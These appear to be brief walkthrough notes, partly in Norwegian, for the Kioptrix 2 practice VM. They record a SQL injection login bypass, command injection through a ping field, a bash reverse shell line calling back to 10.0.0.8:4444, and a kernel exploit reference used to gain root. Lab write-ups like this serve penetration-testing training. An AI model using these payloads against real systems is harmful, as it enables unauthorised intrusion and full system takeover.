kioptrix 2 (level 1.1)

admin' or '1'='1

admin' or '1'='1

ping console

10.0.0.13;whoami for å kjøre kommandoer ;

bash -i >& /dev/tcp/10.0.0.8/4444 0>&1

shell

centos 4.5 og kernel 2.6

last opp 954.c

https://www.exploit-db.com/exploits/9542/

exploit :D

root

results matching ""

    No results matching ""